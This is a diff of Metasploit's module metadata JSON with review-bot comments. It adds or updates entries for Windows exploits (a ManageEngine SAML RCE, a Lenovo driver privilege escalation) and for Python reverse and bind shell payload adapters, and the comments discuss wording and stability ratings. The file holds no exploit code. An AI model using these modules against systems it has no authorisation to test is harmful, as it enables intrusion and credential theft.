"is_install_path": true,
"ref_name": "windows/http/exchange_proxylogon_rce",
@@ -145066,7 +146697,7 @@
"Windows Command",
"Windows Powershell"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb",
"is_install_path": true,
"ref_name": "windows/http/hpe_sim_76_amf_deserialization",
@@ -146519,6 +148150,73 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966": {
"name": "ManageEngine Endpoint Central Unauthenticated SAML RCE",
"fullname": "exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-10",
"type": "exploit",
"author": [
"Khoa Dinh",
"horizon3ai",
"Christophe De La Fuente",
"h00die-gr3y <h00die.gr3y@gmail.com>"
],
"description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10\n and below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the Endpoint Central\n SAML endpoint. Note that the target is only vulnerable if it is\n configured with SAML-based SSO , and the service should be active.",
"references": [
"CVE-2022-47966",
"URL-https://blog.viettelcybersecurity.com/saml-show-stopper/",
"URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
"URL-https://github.com/horizon3ai/CVE-2022-47966",
"URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis"
],
"platform": "Windows",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows EXE Dropper",
"Windows Command"
],
"mod_time": "2023-01-29 10:06:14 +0000",
"path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/manageengine_servicedesk_plus_cve_2021_44077": {
"name": "ManageEngine ServiceDesk Plus CVE-2021-44077",
"fullname": "exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077",
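Review bot: the description string of the new `exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966` entry has a stray space before the comma in `configured with SAML-based SSO , and the service should be active`, and `Due to a dependency to an outdated library` should read `dependency on`; this JSON is regenerated from the module, so the wording needs fixing in the module's description block rather than here. Also worth a second look: `SideEffects` lists `artifacts-on-disk` and one target is `Windows EXE Dropper`, yet `needs_cleanup` is `null`, which suggests the module does not register the dropped file for cleanup; either wire the dropper into the cleanup machinery so the flag is populated, or document that the executable is left behind on the target.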
@@ -148962,7 +150660,7 @@
"Windows Command",
"Windows Powershell"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb",
"is_install_path": true,
"ref_name": "windows/http/sharepoint_workflows_xoml",
@@ -152623,7 +154321,7 @@
"targets": [
"Windows x86/x64 with x86 payload"
],
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-01-28 09:08:51 +0000",
"path": "/modules/exploits/windows/local/anyconnect_lpe.rb",
"is_install_path": true,
"ref_name": "windows/local/anyconnect_lpe",
@@ -153199,7 +154897,7 @@
"Windows x86",
"Windows x64"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-09 11:43:20 +0000",
"path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_injection_winsxs",
@@ -154098,7 +155796,7 @@
"bee13oy",
"timwr"
],
"description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n within win32k. The out of bounds write can be used to overwrite the pvbits of a\n SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n This module has been tested against a fully updated Windows 7 x64 SP1. Offsets\n within the exploit code may need to be adjusted to work with other versions of\n Windows.",
"description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n within win32k. The out of bounds write can be used to overwrite the pvbits of a\n SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n This module has been tested against a fully updated Windows 7 x64 SP1. Offsets\n within the exploit code may need to be adjusted to work with other versions of\n Windows.",
"references": [
"CVE-2020-1054",
"URL-https://cpr-zero.checkpoint.com/vulns/cprid-2153/",
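Review bot: the old and new description lines in this hunk are character-for-character identical in this view, so the change is whitespace-only (indentation or trailing whitespace inside the module's description heredoc), consistent with the `mod_time` bump in the next hunk; nothing to review beyond confirming the regeneration came from the same commit. Small style point for the module source while it is being touched: `pvbits` is the `pvBits` member of `SURFOBJ`, so use the struct's capitalisation.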
@@ -154119,7 +155817,7 @@
"targets": [
"Windows 7 x64"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb",
"is_install_path": true,
"ref_name": "windows/local/cve_2020_1054_drawiconex_lpe",
@@ -154605,6 +156303,59 @@
],
"needs_cleanup": true
},
"exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver": {
"name": "Lenovo Diagnostics Driver IOCTL memmove",
"fullname": "exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver",
"aliases": [
],
"rank": 400,
"disclosure_date": "2022-11-09",
"type": "exploit",
"author": [
"alfarom256",
"jheysel-r7"
],
"description": "Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to\n issue device IOCTLs to perform arbitrary physical/virtual memory read/write.",
"references": [
"CVE-2022-3699",
"URL-https://github.com/alfarom256/CVE-2022-3699/"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2023-01-19 22:16:54 +0000",
"path": "/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb",
"is_install_path": true,
"ref_name": "windows/local/cve_2022_3699_lenovo_diagnostics_driver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": null
},
"exploit_windows/local/dnsadmin_serverlevelplugindll": {
"name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
"fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
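Review bot: the description of the new `exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver` entry restates the CVE summary (`Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.`) but never says what the module does with that primitive, i.e. that it escalates the session to SYSTEM, nor that the driver must already be installed on the target; `allows ... the ability to` is also redundant and should become `allows a low-privileged user to issue device IOCTLs`. `Stability: crash-safe` is a strong rating for an arbitrary kernel memory write: a wrong offset or target bugchecks the host, so the module documentation should state what `check` verifies (driver present, version matched) before any write is attempted, or the rating should be `crash-os-down`. The references list only the CVE and the PoC repository; the vendor advisory belongs there too.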
@@ -154992,7 +156743,7 @@
"targets": [
"Windows"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/local/lexmark_driver_privesc.rb",
"is_install_path": true,
"ref_name": "windows/local/lexmark_driver_privesc",
@@ -156385,7 +158136,7 @@
"Grant Willcox",
"timwr"
],
"description": "This module exploits a NULL pointer dereference vulnerability in\n MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n function does not effectively check the validity of the tagPOPUPMENU\n objects it processes before passing them on to MNGetpItemFromIndex(),\n where the NULL pointer dereference will occur.\n\n This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n within the solution may need to be adjusted to work with other versions\n of Windows, such as Windows Server 2008.",
"description": "This module exploits a NULL pointer dereference vulnerability in\n MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n function does not effectively check the validity of the tagPOPUPMENU\n objects it processes before passing them on to MNGetpItemFromIndex(),\n where the NULL pointer dereference will occur.\n\n This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n within the solution may need to be adjusted to work with other versions\n of Windows, such as Windows Server 2008.",
"references": [
"CVE-2019-0808",
"URL-https://github.com/exodusintel/CVE-2019-0808",
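Review bot: the description in this hunk is again identical before and after, so the change is whitespace-only; while the module text is being regenerated, `Offsets within the solution may need to be adjusted` should say `within the module` or `within the exploit`, matching the wording used by the `cve_2020_1054_drawiconex_lpe` description earlier in this diff. Fix it in the module source, not in this generated file.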
@@ -156405,7 +158156,7 @@
"targets": [
"Windows 7 x86"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/local/ntusermndragover.rb",
"is_install_path": true,
"ref_name": "windows/local/ntusermndragover",
@@ -157368,7 +159119,7 @@
"targets": [
"Automatic"
],
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/windows/local/tokenmagic.rb",
"is_install_path": true,
"ref_name": "windows/local/tokenmagic",
@@ -164097,7 +165848,7 @@
"targets": [
"Windows Universal (x64) - v7.80.3132"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
"is_install_path": true,
"ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -164107,6 +165858,12 @@
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
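Review bot: `Stability: crash-safe` is hard to justify for `nimcontroller_bof`, a buffer overflow whose only target is `Windows Universal (x64) - v7.80.3132`; against any other build the corrupted stack or heap data will normally take the controller service down, which is `crash-service-down`, not `crash-safe`. Either document what `check` verifies about the version before the overflow is sent, so the rating is defensible, or rate the module honestly. `SideEffects` is also empty, but a remote overflow that delivers a payload leaves at least `ioc-in-logs` on most targets; state why there are none if that is intended.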
@@ -170345,7 +172102,7 @@
"author": [
"thelightcosine"
],
"description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2.0 and VBS CmdStager.\n\n The module will check if Powershell 2.0 is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.\n\n IMPORTANT: If targeting an x64 system with the Powershell method\n you MUST select an x64 payload. An x86 payload will never return.",
"description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2 (and above) and VBS CmdStager.\n\n The module will check if Powershell is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx"
],
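Review bot: this hunk removes the `IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.` warning and widens `Powershell 2.0` to `Powershell 2 (and above)`. Dropping the warning is only correct if the module change this metadata was generated from actually handles the architecture mismatch (for example by launching the matching PowerShell host for an x86 payload on an x64 target); if it merely stopped mentioning the problem, keep the warning. The rewritten text also says the VBS CmdStager fallback is `less stealthy` without saying why; naming the artifact (a script written to disk) would tell users what the `artifacts-on-disk` note in the next hunk refers to.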
@@ -170373,14 +172130,24 @@
"targets": [
"Windows"
],
"mod_time": "2021-01-29 11:17:38 +0000",
"mod_time": "2023-01-03 11:26:07 +0000",
"path": "/modules/exploits/windows/winrm/winrm_script_exec.rb",
"is_install_path": true,
"ref_name": "windows/winrm/winrm_script_exec",
"check": false,
"post_auth": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
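Review bot: `post_auth` flips from `true` to `false` in this hunk, but the module's description (previous hunk) still opens with `This module uses valid credentials to login to the WinRM service`, so this is a credentialed module and `post_auth` must stay `true`. The flip most likely comes from the refactor that moved `mod_time` to 2023-01-03 dropping whatever mixin previously reported `post_auth?` as true; the module should override `post_auth?` to return `true` (or keep the mixin) so that module searches and filters relying on this flag are not misled. The added `notes` block (`crash-safe`, `artifacts-on-disk`, `ioc-in-logs`, `repeatable-session`) is reasonable for a credentialed remote-exec module, but `needs_cleanup` stays `null` while `artifacts-on-disk` is declared, so confirm whether the dropped script is registered for cleanup or document that it is left behind.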
@@ -186284,6 +188051,594 @@
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/bind_tcp": {
"name": "Python Exec, Python Meterpreter, Python Bind TCP Stager",
"fullname": "payload/cmd/windows/python/meterpreter/bind_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/bind_tcp_uuid": {
"name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support",
"fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"OJ Reeves"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/reverse_http": {
"name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager",
"fullname": "payload/cmd/windows/python/meterpreter/reverse_http",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/reverse_https": {
"name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager",
"fullname": "payload/cmd/windows/python/meterpreter/reverse_https",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/reverse_tcp": {
"name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager",
"fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": {
"name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager",
"fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"RageLtMan"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": {
"name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support",
"fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"OJ Reeves"
],
"description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter_bind_tcp": {
"name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline",
"fullname": "payload/cmd/windows/python/meterpreter_bind_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter_reverse_http": {
"name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline",
"fullname": "payload/cmd/windows/python/meterpreter_reverse_http",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter_reverse_https": {
"name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline",
"fullname": "payload/cmd/windows/python/meterpreter_reverse_https",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/meterpreter_reverse_tcp": {
"name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline",
"fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/pingback_bind_tcp": {
"name": "Python Exec, Python Pingback, Bind TCP (via python)",
"fullname": "payload/cmd/windows/python/pingback_bind_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"asoto-r7"
],
"description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/pingback_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/pingback_reverse_tcp": {
"name": "Python Exec, Python Pingback, Reverse TCP (via python)",
"fullname": "payload/cmd/windows/python/pingback_reverse_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"asoto-r7"
],
"description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/pingback_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/shell_bind_tcp": {
"name": "Python Exec, Command Shell, Bind TCP (via python)",
"fullname": "payload/cmd/windows/python/shell_bind_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"mumbai"
],
"description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/shell_reverse_tcp": {
"name": "Python Exec, Command Shell, Reverse TCP (via python)",
"fullname": "payload/cmd/windows/python/shell_reverse_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/shell_reverse_tcp_ssl": {
"name": "Python Exec, Command Shell, Reverse TCP SSL (via python)",
"fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/python/shell_reverse_udp": {
"name": "Python Exec, Command Shell, Reverse UDP (via python)",
"fullname": "payload/cmd/windows/python/shell_reverse_udp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-20 14:53:59 +0000",
"path": "/modules/payloads/adapters/cmd/windows/python.rb",
"is_install_path": true,
"ref_name": "cmd/windows/python/shell_reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"payload_cmd/windows/reverse_lua": {
"name": "Windows Command Shell, Reverse TCP (via Lua)",
"fullname": "payload/cmd/windows/reverse_lua",
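Review bot: all seventeen `payload_cmd/windows/python/*` entries in this hunk share `"path": "/modules/payloads/adapters/cmd/windows/python.rb"`, so this is a new Windows command adapter wrapping the existing Python payloads; two things should be confirmed before landing. First, the stageless `meterpreter_bind_tcp`, `meterpreter_reverse_http`, `meterpreter_reverse_https` and `meterpreter_reverse_tcp` variants carry the whole Python Meterpreter inside one command, and a Windows command line is length-limited (cmd.exe caps at 8191 characters), so the adapter documentation should say how it stays within that limit or which of these variants are actually usable from a command-injection context. Second, the descriptions are inconsistent about interpreter support: the staged Meterpreter entries say `compatible with 2.5-2.7 & 3.1+`, the stageless ones say nothing, and the shell entries say `2.4-2.7 and 3.4+` or `2.6-2.7 and 3.4+`; since the adapter prepends `Execute a Python payload from a command.` to each, it should also state its own requirement (a `python` interpreter reachable on the target's PATH) so the inherited ranges are not read as the adapter's. Minor: `Connect back to the attacker and spawn a Meterpreter shell` is identical for the `meterpreter_reverse_http`, `meterpreter_reverse_https` and `meterpreter_reverse_tcp` entries, so only the name distinguishes the transport.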
@@ -205304,7 +207659,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/aix/hashdump.rb",
"is_install_path": true,
"ref_name": "aix/hashdump",
@@ -205340,7 +207695,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-12-20 11:17:39 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/android/capture/screen.rb",
"is_install_path": true,
"ref_name": "android/capture/screen",
@@ -205368,7 +207723,7 @@
"h00die",
"timwr"
],
"description": "Post Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.",
